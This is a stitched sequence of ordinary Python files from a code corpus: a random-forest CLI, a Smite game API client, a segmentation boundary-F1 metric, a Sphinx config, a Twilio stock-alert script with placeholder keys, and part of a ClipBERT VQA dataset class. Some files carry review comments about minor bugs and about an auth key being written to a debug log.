        # BUGFIX: was hard-coded to True, silently ignoring --warm_start.
        warm_start=args.warm_start,
        class_weight=args.class_weight
    )

    folds = None if args.x_val is None else args.x_val

    trainer = SKTrainer(model=model,
                        train_set=(X_train, y_train),
                        test_set=(X_test, y_test),
                        output_model_name=args.output_model,
                        testing_mode=args.test_mode,
                        folds=folds)

    trainer.run()
if __name__ == '__main__':
    # CLI entry point: every value arrives as a *string* (including textual
    # "None" defaults) and is cast to its real type later by ``_cast_types``.
    parser = argparse.ArgumentParser(description="""Random Forests Classifier""")

    # ----- cnvrg.io params.
    parser.add_argument('--data', action='store', dest='data', required=True,
                        help="""String. path to csv file: The data set for the classifier. Assumes the last column includes the labels. """)

    parser.add_argument('--project_dir', action='store', dest='project_dir',
                        help="""--- For inner use of cnvrg.io ---""")

    parser.add_argument('--output_dir', action='store', dest='output_dir',
                        help="""--- For inner use of cnvrg.io ---""")

    parser.add_argument('--x_val', action='store', default="None", dest='x_val',
                        help="""Integer. Number of folds for the cross-validation. Default is None.""")

    parser.add_argument('--test_size', action='store', default="0.2", dest='test_size',
                        help="""Float. The portion of the data of testing. Default is 0.2""")

    parser.add_argument('--output_model', action='store', default="model.sav", dest='output_model',
                        help="""String. The name of the output file which is a trained random forests model. Default is RandomForestModel.sav""")

    parser.add_argument('--test_mode', action='store', default=False, dest='test_mode',
                        help="""--- For inner use of cnvrg.io ---""")

    # ----- model's params.
    parser.add_argument('--n_estimators', action='store', default="10", dest='n_estimators',
                        help="""int: The number of trees in the forest. Default is 10""")

    parser.add_argument('--criterion', action='store', default='gini', dest='criterion',
                        help="""string: The function to measure the quality of a split. Supported criteria are “gini” for the Gini impurity and “entropy” for the information gain. Note: this parameter is tree-specific. Default is gini.""")

    parser.add_argument('--max_depth', action='store', default="None", dest='max_depth',
                        help="""int: The maximum depth of the tree. If None, then nodes are expanded until all leaves are pure or until all leaves contain less than min_samples_split samples. Default is None""")

    # Might be int or float.
    parser.add_argument('--min_samples_split', action='store', default="2", dest='min_samples_split',
                        help="""int, float: The minimum number of samples required to split an internal node:
                        If int, then consider min_samples_split as the minimum number.
                        If float, then min_samples_split is a fraction and ceil(min_samples_split * n_samples) are the
                        minimum number of samples for each split.. Default is 2""")

    # Might be int or float.
    parser.add_argument('--min_samples_leaf', action='store', default="1", dest='min_samples_leaf',
                        help="""int, float: The minimum number of samples required to be at a leaf node. A split point
                        at any depth will only be considered if it leaves at least min_samples_leaf training samples in
                        each of the left and right branches. This may have the effect of smoothing the model, especially
                        in regression.
                        If int, then consider min_samples_leaf as the minimum number.
                        If float, then min_samples_leaf is a fraction and ceil(min_samples_leaf * n_samples) are the
                        minimum number of samples for each node. Default is 1""")

    parser.add_argument('--min_weight_fraction_leaf', action='store', default="0.",
                        dest='min_weight_fraction_leaf', help="""float: The minimum weighted fraction of the sum total
                        of weights (of all the input samples) required to be at a leaf node. Samples have equal weight
                        when sample_weight is not provided. Default is 0.""")

    # Might be int, float, string or None.
    parser.add_argument('--max_features', action='store', default="auto", dest='max_features',
                        help="""int, float, string, None: The number of features to consider when looking for the best split.
                        If int, then consider max_features features at each split.
                        If float, then max_features is a fraction and int(max_features * n_features) features are
                        considered at each split.
                        If “auto”, then max_features=sqrt(n_features).
                        If “sqrt”, then max_features=sqrt(n_features) (same as “auto”).
                        If “log2”, then max_features=log2(n_features).
                        If None, then max_features=n_features
                        Default is None.""")

    parser.add_argument('--max_leaf_nodes', action='store', default="None", dest='max_leaf_nodes',
                        help="""int, None,.Grow trees with max_leaf_nodes in best-first fashion Default is None.""")

    parser.add_argument('--min_impurity_decrease', action='store', default="0.", dest='min_impurity_decrease',
                        help="""float,.A node will be split if this split induces a decrease of the impurity greater
                        than or equal to this value. Default is 0..""")

    parser.add_argument('--min_impurity_split', action='store', default="None", dest='min_impurity_split',
                        help="""Deprecated since version 0.19: min_impurity_split has been deprecated in favor of
                        min_impurity_decrease in 0.19..""")

    parser.add_argument('--bootstrap', action='store', default="True", dest='bootstrap',
                        help="""Boolean. Whether bootstrap samples are used when building trees. If False, the whole
                        dataset is used to build each tree. Default is True.""")

    parser.add_argument('--oob_score', action='store', default="False", dest='oob_score',
                        help="""Boolean. Whether to use out-of-bag samples to estimate the generalization accuracy..
                        Default is False.""")

    parser.add_argument('--n_jobs', action='store', default="1", dest='n_jobs',
                        help="""Integer. The number of jobs to run in parallel for both fit and predict. None means 1.
                        Default is None.""")

    # Might be int, RandomState instance or None.
    parser.add_argument('--random_state', action='store', default="None", dest='random_state',
                        help="""int, RandomState instance or None. If int, random_state is the seed used by the random
                        number generator; If RandomState instance, random_state is the random number generator; If None,
                        the random number generator is the RandomState instance used by np.random. Default is None.""")

    parser.add_argument('--verbose', action='store', default="0", dest='verbose',
                        help="""Integer. Controls the verbosity when fitting and predicting. Default is 0.""")

    parser.add_argument('--warm_start', action='store', default="True", dest='warm_start',
                        help="""Boolean. When set to True, reuse the solution of the previous call to fit and add more
                        estimators to the ensemble, otherwise, just fit a whole new forest.. Default is False.""")

    # Might be dict, list of dicts, “balanced”, “balanced_subsample” or None
    parser.add_argument('--class_weight', action='store', default="None", dest='class_weight',
                        help="""dict, list of dicts, “balanced”, “balanced_subsample” or None.
                        Weights associated with classes in the form {class_label: weight}. If not given, all classes are
                        supposed to have weight one. For multi-output problems, a list of dicts can be provided in the
                        same order as the columns of y. Default is None.""")

    args = parser.parse_args()
    main(args)
| 2.46875 | 2 |
smite.py | micahprice/smite-recommender | 0 | 12760334 | <reponame>micahprice/smite-recommender
"""
smite-python (github.com/jaydenkieran/smite-python)
Distributed under the MIT License by <NAME>
"""
import hashlib
import traceback
import urllib
from enum import Enum
from urllib.request import urlopen
import json
import logging
from datetime import datetime
version = '1.0_rc2'
# Initialise logging
# NOTE: importing this module has side effects — it creates/appends the file
# 'recent.log' in the current working directory and logs a load banner.
logger = logging.getLogger('smitepython')
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('recent.log', encoding='utf-8')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter(fmt='%(asctime)s [%(levelname)s]: %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')
fh.setFormatter(formatter)
logger.addHandler(fh)
logger.info('Loaded smite-python {}, github.com/jaydenkieran/smite-python'.format(version))
class SmiteError(Exception):
    """Base exception for smite-python errors.

    Every instantiation is recorded in the module logger so failed API
    calls leave a trace in recent.log.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        logger.error('SmiteError: {}'.format(args))
class NoResultError(SmiteError):
    """Raised when a Smite API request fails or returns an empty payload.

    The explicit ``__init__`` that merely forwarded ``*args``/``**kwargs``
    to ``SmiteError.__init__`` was redundant; inheriting the parent
    constructor is behaviourally identical (including its error logging).
    """
class Endpoint(Enum):
    """
    Platform-specific base URLs for the Hi-Rez Smite API.
    Valid enums: PC, PS4, XBOX
    """
    # Each value is a fully-qualified service root, trailing slash included.
    PC = "http://api.smitegame.com/smiteapi.svc/"
    PS4 = "http://api.ps4.smitegame.com/smiteapi.svc/"
    XBOX = "http://api.xbox.smitegame.com/smiteapi.svc/"
class SmiteClient(object):
    """
    Represents a connection to the Smite API.
    This class is used to interact with the API and retrieve information in JSON.
    Note
    -----
    Any player with Privacy Mode enabled in-game will return
    a null dataset from methods that require a player name
    """
    # Response format suffix appended to every method name in request URLs.
    _RESPONSE_FORMAT = 'Json'
    def __init__(self, dev_id, auth_key, lang=1):
        """
        :param dev_id: Your private developer ID supplied by Hi-rez. Can be requested here: https://fs12.formsite.com/HiRez/form48/secure_index.html
        :param auth_key: Your authorization key
        :param lang: the language code needed by some queries, default to english.
        """
        self.dev_id = str(dev_id)
        self.auth_key = str(auth_key)
        self.lang = lang
        self._session = None
        self._BASE_URL = Endpoint.PC.value
        # NOTE(review): the auth key is written to the debug log here —
        # consider redacting before shipping.
        logger.debug('dev_id: {}, auth_key: {}, lang: {}'.format(self.dev_id, self.auth_key, self.lang))
    def _make_request(self, methodname, parameters=None):
        """Issue an authenticated API call, (re)creating the session if needed."""
        if not self._session or not self._test_session(self._session):
            logger.info('Creating new session with the SmiteAPI')
            self._session = self._create_session()
        url = self._build_request_url(methodname, parameters)
        url = url.replace(' ', '%20') # Cater for spaces in parameters
        logger.debug('Built request URL for {}: {}'.format(methodname, url))
        try:
            html = urlopen(url).read()
        except urllib.error.HTTPError as e:
            if e.code == 404:
                raise NoResultError("Request invalid. API auth details may be incorrect.") from None
            if e.code == 400:
                raise NoResultError("Request invalid. Bad request.") from None
            else:
                # NOTE(review): for other HTTP errors execution falls through
                # with 'html' unbound, so json.loads below raises NameError —
                # confirm whether re-raising was intended.
                traceback.print_exc()
        jsonfinal = json.loads(html.decode('utf-8'))
        if not jsonfinal:
            raise NoResultError("Request was successful, but returned no data.") from None
        return jsonfinal
    def _build_request_url(self, methodname, parameters=()):
        # URL layout: <base>/<method><format>/<dev_id>/<signature>/<session>/<timestamp>[/params...]
        signature = self._create_signature(methodname)
        timestamp = self._create_now_timestamp()
        session_id = self._session.get("session_id")
        path = [methodname + SmiteClient._RESPONSE_FORMAT, self.dev_id, signature, session_id, timestamp]
        if parameters:
            path += [str(param) for param in parameters]
        return self._BASE_URL + '/'.join(path)
    def _create_session(self):
        """Open a new API session and return the parsed JSON response."""
        signature = self._create_signature('createsession')
        url = '{0}/createsessionJson/{1}/{2}/{3}'.format(self._BASE_URL, self.dev_id, signature, self._create_now_timestamp())
        try:
            html = urlopen(url).read()
        except urllib.error.HTTPError as e:
            if e.code == 404:
                raise NoResultError("Couldn't create session. API auth details may be incorrect.") from None
            else:
                # NOTE(review): same unbound-'html' fall-through as in
                # _make_request; confirm intended error handling.
                traceback.print_exc()
        return json.loads(html.decode('utf-8'))
    def _create_now_timestamp(self):
        """Return the current UTC time as the API's yyyyMMddHHmmss string."""
        datime_now = datetime.utcnow()
        return datime_now.strftime("%Y%m%d%H%M%S")
    def _create_signature(self, methodname):
        # MD5(dev_id + method + auth_key + timestamp) — the signature scheme
        # required by the Hi-Rez API.
        now = self._create_now_timestamp()
        return hashlib.md5(self.dev_id.encode('utf-8') + methodname.encode('utf-8') + self.auth_key.encode('utf-8') + now.encode('utf-8')).hexdigest()
    def _test_session(self, session):
        """Return True if the given session is still accepted by the API."""
        methodname = 'testsession'
        timestamp = self._create_now_timestamp()
        signature = self._create_signature(methodname)
        path = "/".join(
            [methodname + self._RESPONSE_FORMAT, self.dev_id, signature, session.get("session_id"), timestamp])
        url = self._BASE_URL + path
        logger.debug('Testing session using: {}'.format(url))
        try:
            html = urlopen(url).read()
        except urllib.error.HTTPError as e:
            if e.code == 404:
                raise NoResultError("Couldn't test session. API auth details may be incorrect.") from None
            else:
                # NOTE(review): same unbound-'html' fall-through as above.
                traceback.print_exc()
        return "successful" in json.loads(html.decode('utf-8'))
    def _switch_endpoint(self, endpoint):
        """Point the client at a different platform endpoint (PC/PS4/XBOX)."""
        if not isinstance(endpoint, Endpoint):
            raise SmiteError("You need to use an enum to switch endpoints")
        self._BASE_URL = endpoint.value
        logger.debug('Endpoint switch. New call URL: {}'.format(self._BASE_URL))
        return
    def ping(self):
        """
        :return: Indicates whether the request was successful
        Note
        -----
        Pinging the Smite API is used to establish connectivity.
        You do not need to authenticate your ID or key to do this.
        """
        url = '{0}/pingJson'.format(self._BASE_URL)
        html = urlopen(url).read()
        return json.loads(html.decode('utf-8'))
    def get_data_used(self):
        """
        :return: Returns a dictionary of daily usage limits and the stats against those limits
        Note
        -----
        Getting your data usage does contribute to your
        daily API limits
        """
        return self._make_request('getdataused')
    def get_demo_details(self, match_id):
        """
        :param match_id: ID of the match
        :return: Returns information regarding a match
        Note
        -----
        It is better practice to use :meth:`get_match_details`
        """
        return self._make_request('getdemodetails', [match_id])
    def get_gods(self):
        """
        :return: Returns all smite Gods and their various attributes
        """
        return self._make_request('getgods', [self.lang])
    def get_god_skins(self, god_id):
        """
        :param: god_id: ID of god you are querying. Can be found in get_gods return result.
        :return: Returns all skin information for a particular god
        """
        return self._make_request('getgodskins', [god_id])
    def get_items(self):
        """
        :return: Returns all Smite items and their various attributes
        """
        return self._make_request('getitems', [self.lang])
    def get_god_recommended_items(self, god_id):
        """
        :param god_id: ID of god you are querying. Can be found in get_gods return result.
        :return: Returns a dictionary of recommended items for a particular god
        """
        return self._make_request('getgodrecommendeditems', [god_id])
    def get_esports_proleague_details(self):
        """
        :return: Returns the matchup information for each matchup of the current eSports pro league session.
        """
        return self._make_request('getesportsproleaguedetails')
    def get_top_matches(self):
        """
        :return: Returns the 50 most watch or most recent recorded matches
        """
        return self._make_request('gettopmatches')
    def get_match_details(self, match_id):
        """
        :param match_id: The id of the match
        :return: Returns a dictionary of the match and it's attributes.
        """
        return self._make_request('getmatchdetails', [match_id])
    def get_match_ids_by_queue(self, queue, date, hour=-1):
        """
        :param queue: The queue to obtain data from
        :param date: The date to obtain data from
        :param hour: The hour to obtain data from (0-23, -1 = all day)
        :return: Returns a list of all match IDs for a specific match queue for given time frame
        """
        return self._make_request('getmatchidsbyqueue', [queue, date, hour])
    def get_league_leaderboard(self, queue, tier, season):
        """
        :param queue: The queue to obtain data from
        :param tier: The tier to obtain data from
        :param season: The season to obtain data from
        :return: Returns the top players for a particular league
        """
        return self._make_request('getleagueleaderboard', [queue, tier, season])
    def get_league_seasons(self, queue):
        """
        :param queue: The queue to obtain data from
        :return: Returns a list of seasons for a match queue
        """
        return self._make_request('getleagueseasons', [queue])
    def get_team_details(self, clan_id):
        """
        :param clan_id: The id of the clan
        :return: Returns the details of the clan in a python dictionary
        """
        return self._make_request('getteamdetails', [clan_id])
    def get_team_match_history(self, clan_id):
        """
        :param clan_id: The ID of the clan.
        :return: Returns a history of matches from the given clan.
        Warning
        -----
        This method is deprecated and will return a null dataset
        """
        return self._make_request('getteammatchhistory', [clan_id])
    def get_team_players(self, clan_id):
        """
        :param clan_id: The ID of the clan
        :return: Returns a list of players for the given clan.
        """
        return self._make_request('getteamplayers', [clan_id])
    def search_teams(self, search_team):
        """
        :param search_team: The string search term to search against
        :return: Returns high level information for clan names containing search_team string
        """
        return self._make_request('searchteams', [search_team])
    def get_player(self, player_name):
        """
        :param player_name: the string name of a player
        :return: Returns league and non-league high level data for a given player name
        """
        return self._make_request('getplayer', [player_name])
    def get_player_achievements(self, player_id):
        """
        :param player_id: ID of a player
        :return: Returns a select number of achievement totals for the specified player ID
        """
        return self._make_request('getplayerachievements', [player_id])
    def get_player_status(self, player_name):
        """
        :param player_name: the string name of a player
        :return: Returns the current online status of a player
        """
        return self._make_request('getplayerstatus', [player_name])
    def get_friends(self, player):
        """
        :param player: The player name or a player ID
        :return: Returns a list of friends
        """
        return self._make_request('getfriends', [player])
    def get_god_ranks(self, player):
        """
        :param player: The player name or player ID
        :return: Returns the rank and worshippers value for each God the player has played
        """
        return self._make_request('getgodranks', [player])
    def get_match_history(self, player):
        """
        :param player: The player name or player ID
        :return: Returns the recent matches and high level match statistics for a particular player.
        """
        return self._make_request('getmatchhistory', [str(player)])
    def get_match_player_details(self, match_id):
        """
        :param match_id: The ID of the match
        :return: Returns player information for a live match
        """
        return self._make_request('getmatchplayerdetails', [match_id])
    def get_motd(self):
        """
        :return: Returns information about the most recent Match of the Days
        """
        return self._make_request('getmotd')
    def get_queue_stats(self, player, queue):
        """
        :param player: The player name or player ID
        :param queue: The id of the game mode
        :return: Returns match summary statistics for a player and queue
        """
        return self._make_request('getqueuestats', [str(player), str(queue)])
| 2.171875 | 2 |
lib/metrics/F1_running_score.py | shampooma/openseg.pytorch | 1,069 | 12760335 | <gh_stars>1000+
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
## Created by: JingyiXie, RainbowSecret
## Microsoft Research
## <EMAIL>
## Copyright (c) 2019
##
## Code adapted from:
## https://github.com/nv-tlabs/GSCNN/blob/master/utils/f_boundary.py
##
## This source code is licensed under the MIT-style license found in the
## LICENSE file in the root directory of this source tree
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pdb
import numpy as np
import torch
from multiprocessing.pool import Pool
class F1RunningScore(object):
    """Running boundary-F1 accumulator for semantic segmentation.

    Predictions and ground truths are buffered; once `num_proc` samples are
    cached they are scored in parallel via a multiprocessing pool running
    `db_eval_boundary`, and per-class F statistics are accumulated.
    """

    def __init__(self, configer=None, num_classes=None, boundary_threshold=0.00088, num_proc=15):
        """
        :param configer: project config object; when given, the class count is
            read from it via ('data', 'num_classes').
        :param num_classes: explicit class count (used when configer is None).
        :param boundary_threshold: boundary-match tolerance — an absolute pixel
            count if >= 1, otherwise a fraction of the image diagonal.
        :param num_proc: number of worker processes (also the scoring batch size).
        """
        assert configer is not None or num_classes is not None
        self.configer = configer
        if configer is not None:
            self.n_classes = self.configer.get('data', 'num_classes')
        else:
            self.n_classes = num_classes
        self.ignore_index = -1
        self.boundary_threshold = boundary_threshold
        self.pool = Pool(processes=num_proc)
        self.num_proc = num_proc
        # Scalar 0 until the first batch is scored, then per-class ndarrays.
        self._Fpc = 0
        self._Fc = 0
        self.seg_map_cache = []
        self.gt_map_cache = []

    def _update_cache(self, seg_map, gt_map):
        """
        Append inputs to `seg_map_cache` and `gt_map_cache`.
        Returns whether the length reached our pool size.
        """
        self.seg_map_cache.extend(seg_map)
        self.gt_map_cache.extend(gt_map)
        return len(self.gt_map_cache) >= self.num_proc

    def _get_from_cache(self):
        # Pop one pool-sized chunk off the front of both caches.
        n = self.num_proc
        seg_map, self.seg_map_cache = self.seg_map_cache[:n], self.seg_map_cache[n:]
        gt_map, self.gt_map_cache = self.gt_map_cache[:n], self.gt_map_cache[n:]
        return seg_map, gt_map

    def update(self, seg_map, gt_map):
        """Buffer a batch; score one chunk once `num_proc` samples are cached."""
        if self._update_cache(seg_map, gt_map):
            seg_map, gt_map = self._get_from_cache()
            self._update_scores(seg_map, gt_map)

    def _update_scores(self, seg_map, gt_map):
        """Score one chunk of samples and fold results into the accumulators."""
        batch_size = len(seg_map)
        if batch_size == 0:
            return
        Fpc = np.zeros(self.n_classes)
        Fc = np.zeros(self.n_classes)
        for class_id in range(self.n_classes):
            args = []
            for i in range(batch_size):
                # A (C, H, W) map is treated as per-class boundary probabilities;
                # an (H, W) map is a hard label map.
                if seg_map[i].shape[0] == self.n_classes:
                    pred_i = seg_map[i][class_id] > 0.5
                    pred_is_boundary = True
                else:
                    pred_i = seg_map[i] == class_id
                    pred_is_boundary = False
                args.append([
                    (pred_i).astype(np.uint8),
                    (gt_map[i] == class_id).astype(np.uint8),
                    (gt_map[i] == -1),
                    self.boundary_threshold,
                    class_id,
                    pred_is_boundary
                ])
            results = self.pool.map(db_eval_boundary, args)
            results = np.array(results)
            Fs = results[:, 0]
            # NaN marks samples where the class did not occur; they do not count.
            _valid = ~np.isnan(Fs)
            Fc[class_id] = np.sum(_valid)
            Fs[np.isnan(Fs)] = 0
            Fpc[class_id] = sum(Fs)
        self._Fc = self._Fc + Fc
        self._Fpc = self._Fpc + Fpc

    def get_scores(self):
        """Flush the cache and return (mean F-score, per-class F-scores).

        Returns (0, 0) when no data has been seen. Bugfixes vs. the original:
        the old `seg_map_cache is None` guard could never fire (the cache is
        initialised to a list), leftover cached samples were re-scored on every
        call (double counting), and calling with no data divided 0 by 0.
        """
        if self.seg_map_cache:
            self._update_scores(self.seg_map_cache, self.gt_map_cache)
            self.seg_map_cache = []
            self.gt_map_cache = []
        if np.isscalar(self._Fc):  # accumulators never updated -> no data seen
            return 0, 0
        F_score = np.sum(self._Fpc / self._Fc) / self.n_classes
        F_score_classwise = self._Fpc / self._Fc
        return F_score, F_score_classwise

    def reset(self):
        """Clear accumulated statistics and any cached, unscored samples."""
        self._Fpc = self._Fc = 0
        self.seg_map_cache = []
        self.gt_map_cache = []
def db_eval_boundary(args):
    """
    Compute the boundary F-measure for one (prediction, ground-truth) pair.
    Calculates precision/recall for boundaries between foreground_mask and
    gt_mask using morphological operators to speed it up.
    Arguments:
        args: a single tuple (packed so the function can be dispatched via
            multiprocessing Pool.map) of:
            foreground_mask (ndarray): binary segmentation image.
            gt_mask (ndarray): binary annotated image.
            ignore_mask (ndarray): pixels excluded from both masks.
            bound_th (float): boundary tolerance (pixels if >= 1, else a
                fraction of the image diagonal).
            class_id (int): class being scored (not used in the computation).
            pred_is_boundary (bool): True if foreground_mask is already a
                boundary map rather than a region mask.
    Returns:
        F (float): boundaries F-measure
        P (float): boundaries precision
    """
    foreground_mask, gt_mask, ignore_mask, bound_th, class_id, pred_is_boundary = args
    assert np.atleast_3d(foreground_mask).shape[2] == 1
    bound_pix = bound_th if bound_th >= 1 else \
        np.ceil(bound_th*np.linalg.norm(foreground_mask.shape))
    # Ignored pixels take part in neither prediction nor ground truth.
    foreground_mask[ignore_mask] = 0
    gt_mask[ignore_mask] = 0
    # Get the pixel boundaries of both masks
    if pred_is_boundary:
        fg_boundary = foreground_mask
    else:
        fg_boundary = seg2bmap(foreground_mask)
    gt_boundary = seg2bmap(gt_mask)
    # Imports kept local so worker processes only pay for them when scoring.
    from skimage.morphology import disk
    from cv2 import dilate

    def binary_dilation(x, d):
        # Bugfix: np.bool was removed from NumPy (>= 1.24); the builtin
        # bool dtype is identical.
        return dilate(x.astype(np.uint8), d).astype(bool)
    fg_dil = binary_dilation(fg_boundary, disk(bound_pix))
    gt_dil = binary_dilation(gt_boundary, disk(bound_pix))
    # Boundary pixels of one mask that fall within tolerance of the other.
    gt_match = gt_boundary * fg_dil
    fg_match = fg_boundary * gt_dil
    # Area of the intersection
    n_fg = np.sum(fg_boundary)
    n_gt = np.sum(gt_boundary)
    # Compute precision and recall, with the degenerate empty-mask cases
    # handled explicitly.
    if n_fg == 0 and n_gt > 0:
        precision = 1
        recall = 0
    elif n_fg > 0 and n_gt == 0:
        precision = 0
        recall = 1
    elif n_fg == 0 and n_gt == 0:
        precision = 1
        recall = 1
    else:
        precision = np.sum(fg_match) / float(n_fg)
        recall = np.sum(gt_match) / float(n_gt)
    # Compute F measure
    if precision + recall == 0:
        F = 0
    else:
        F = 2 * precision * recall / (precision + recall)
    return F, precision
def seg2bmap(seg, width=None, height=None):
    """
    From a segmentation, compute a binary boundary map with 1 pixel wide
    boundaries. The boundary pixels are offset by 1/2 pixel towards the
    origin from the actual segment boundary.
    Arguments:
        seg     : Segments labeled from 1..k.
        width   : Width of desired bmap <= seg.shape[1]
        height  : Height of desired bmap <= seg.shape[0]
    Returns:
        bmap (ndarray): Binary boundary map.
    <NAME> <<EMAIL>>
    January 2003
    """
    # Bugfix: np.bool was removed from NumPy (>= 1.24); builtin bool is the
    # same dtype.
    seg = seg.astype(bool)
    seg[seg > 0] = 1
    assert np.atleast_3d(seg).shape[2] == 1
    width = seg.shape[1] if width is None else width
    height = seg.shape[0] if height is None else height
    h, w = seg.shape[:2]
    ar1 = float(width) / float(height)
    ar2 = float(w) / float(h)
    # Bugfix: the original used bitwise '|', which binds tighter than '>',
    # so the size/aspect-ratio check never tested what it meant to test
    # (and the "Can''t" message rendered as "Cant").
    assert not (width > w or height > h or abs(ar1 - ar2) > 0.01), \
        "Can't convert %dx%d seg to %dx%d bmap." % (w, h, width, height)
    # Shift the mask left / up / diagonally; XOR against the original marks
    # pixels whose right / lower / diagonal neighbour has a different label.
    e = np.zeros_like(seg)
    s = np.zeros_like(seg)
    se = np.zeros_like(seg)
    e[:, :-1] = seg[:, 1:]
    s[:-1, :] = seg[1:, :]
    se[:-1, :-1] = seg[1:, 1:]
    b = seg ^ e | seg ^ s | seg ^ se
    # Image borders: only the mask itself can create a boundary there.
    b[-1, :] = seg[-1, :] ^ e[-1, :]
    b[:, -1] = seg[:, -1] ^ s[:, -1]
    b[-1, -1] = 0
    if w == width and h == height:
        bmap = b
    else:
        bmap = np.zeros((height, width))
        for x in range(w):
            for y in range(h):
                if b[y, x]:
                    # Bugfix: 'floor' was used without ever being imported
                    # (NameError on this branch); np.floor is equivalent.
                    # NOTE(review): '(x - 1) + width / h' looks like it
                    # should be a rescale '(x - 1) * width / w'; kept as-is
                    # to preserve the original mapping — confirm upstream.
                    j = 1 + int(np.floor((y - 1) + height / h))
                    i = 1 + int(np.floor((x - 1) + width / h))
                    bmap[j, i] = 1
    return bmap
docs/conf.py | mitre/thumbtack-client | 3 | 12760336 | <reponame>mitre/thumbtack-client
# -*- coding: utf-8 -*-
# Sphinx documentation build configuration for thumbtack-client.
# Reference: https://www.sphinx-doc.org/en/master/usage/configuration.html
project = "thumbtack-client"
copyright = "2019, The MITRE Corporation"
author = "The MITRE Corporation"
# Short X.Y version and full release string (kept identical here).
version = "0.3.0"
release = "0.3.0"
extensions = [
    "sphinx.ext.autodoc",
    "sphinx.ext.napoleon",
    "sphinx.ext.viewcode",
]
templates_path = ["_templates"]
source_suffix = ".rst"
master_doc = "index"
language = None
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
pygments_style = "sphinx"
# Read the Docs theme; commented-out options show available knobs.
html_theme = "sphinx_rtd_theme"
html_theme_options = {
    # 'canonical_url': '',
    # 'analytics_id': '',
    # 'logo_only': False,
    "display_version": True,
    "prev_next_buttons_location": "bottom",
    # 'style_external_links': False,
    # 'vcs_pageview_mode': '',
    # Toc options
    "collapse_navigation": False,
    "sticky_navigation": True,
    "navigation_depth": 2,
    # 'includehidden': True,
    # 'titles_only': False
}
htmlhelp_basename = "thumbtack-clientdoc"
# LaTeX / man-page / Texinfo output targets.
latex_elements = {}
latex_documents = [
    (
        master_doc,
        "thumbtack-client.tex",
        "thumbtack-client Documentation",
        "The MITRE Corporation",
        "manual",
    ),
]
man_pages = [
    (master_doc, "thumbtack-client", "thumbtack-client Documentation", [author], 1)
]
texinfo_documents = [
    (
        master_doc,
        "thumbtack-client",
        "thumbtack-client Documentation",
        author,
        "thumbtack-client",
        "One line description of project.",
        "Miscellaneous",
    ),
]
main.py | AfkZa4aem/stock_market_notificator | 0 | 12760337 | import requests
from twilio.rest import Client
STOCK_NAME = "TSLA"
COMPANY_NAME = "Tesla"
account_sid = "Your Twilio acc_sid"
auth_token = "Your Twilio acc token"
STOCK_ENDPOINT = "https://www.alphavantage.co/query"
NEWS_ENDPOINT = "https://newsapi.org/v2/everything"
STOCK_API = "your_av_api_token"
NEWS_API = "your_news_api_token"
stocks_params = {
"function": "TIME_SERIES_DAILY",
"symbol": STOCK_NAME,
"apikey": STOCK_API,
}
stocks_response = requests.get(url=STOCK_ENDPOINT, params=stocks_params)
stocks_response.raise_for_status()
stocks_response_data = stocks_response.json()["Time Series (Daily)"]
stocks_data = [value for (key, value) in stocks_response_data.items()]
y_price = float(stocks_data[0]["4. close"])
dby_price = float(stocks_data[1]["4. close"])
positive_diff = y_price - dby_price
up_or_down = None
if positive_diff > 0:
up_or_down = "🔼"
else:
up_or_down = "🔽"
percentage = float("%.2f" % (100 * (positive_diff / y_price)))
print(percentage)
if abs(percentage) > 1:
news_param = {
"qInTitle": COMPANY_NAME,
"language": "en",
"apiKey": NEWS_API
}
news_response = requests.get(url=NEWS_ENDPOINT, params=news_param)
news_response.raise_for_status()
news_data = news_response.json()["articles"]
three_news = news_data[:3]
msg_list = [f"{COMPANY_NAME}: {up_or_down}{positive_diff}%\nHeadline:{article['title']}. \nBrief: {article['description']}" for article in three_news]
print(msg_list)
client = Client(account_sid, auth_token)
for msg in msg_list:
message = client.messages \
.create(
body=msg,
from_='your_twilio_number',
to="your_mobile_number"
)
| 3.078125 | 3 |
src/datasets/dataset_vqa.py | Steve-Tod/ClipBERT | 0 | 12760338 | <filename>src/datasets/dataset_vqa.py
import torch
import numpy as np
from torch.utils.data.dataloader import default_collate
from src.utils.basic_utils import flat_list_of_lists
from src.datasets.dataset_base import ClipBertBaseDataset, img_collate
class ClipBertVQATagDataset(ClipBertBaseDataset):
    """VQA dataset that appends detected object tags to each question.

    Works for both train and test (where labels are not available).
    Nearly identical to ClipBertVQADataset except each example also carries
    an "object_tags" string that the collator joins to the question text.

    datalist: list(tuples) each tuple is (img_id, list(dicts)),
        each dict {
            "type": "image",
            "filepath": "/abs/path/to/COCO_val2014_000000401092.jpg",
            "text": "A plate of food and a beverage are on a table.",
            "labels": {"down": 1, "at table": 0.3, "skateboard": 0.3, "table": 0.3}
            "answer_type": "other"
            "question_id": 262148000
        }
    tokenizer:
    max_img_size: int,
    max_txt_len: int, max text sequence length, including special tokens.
    ans2label: dict mapping answer string -> class index.
    """
    def __init__(self, datalist, tokenizer, img_lmdb_dir, fps=3,
                 max_img_size=1000, max_txt_len=20, ans2label=None):
        super(ClipBertVQATagDataset, self).__init__(
            datalist, tokenizer, img_lmdb_dir, fps=fps,
            max_img_size=max_img_size, max_txt_len=max_txt_len,
        )  # init its parent class
        self.ans2label = ans2label
        self.num_labels = len(ans2label)
        self.label2ans = {v: k for k, v in ans2label.items()}
        # question_id -> raw annotation, used by evaluate_vqa for lookups.
        self.qid2data = {d["question_id"]: d for group in datalist for d in group[1]}
    def __len__(self):
        return len(self.datalist)
    def __getitem__(self, index):
        img_id, examples = self.datalist[index]  # one image with multiple examples
        img_array = self._load_img(img_id)  # tensor
        examples = [self._get_single_example(e) for e in examples]
        return dict(
            img=img_array,
            examples=examples,
            n_examples=len(examples)  # used to create image feature copies.
        )
    def _get_single_example(self, data):
        # Keep only the fields the collator needs; labels are converted to a
        # soft multi-hot target vector when available (training).
        return dict(
            text_str=data["txt"],
            question_id=data["question_id"],
            object_tags = data["object_tags"],
            labels=self._get_vqa_targets(
                data["labels"]) if "labels" in data else None
        )
    def _get_vqa_targets(self, ans2score_dict):
        """
        Args:
            ans2score_dict: {"table": 0.9, "picnic table": 1,
                             "skateboard": 0.3}
        Returns:
            A 1D tensor of length num_labels with the soft VQA scores.
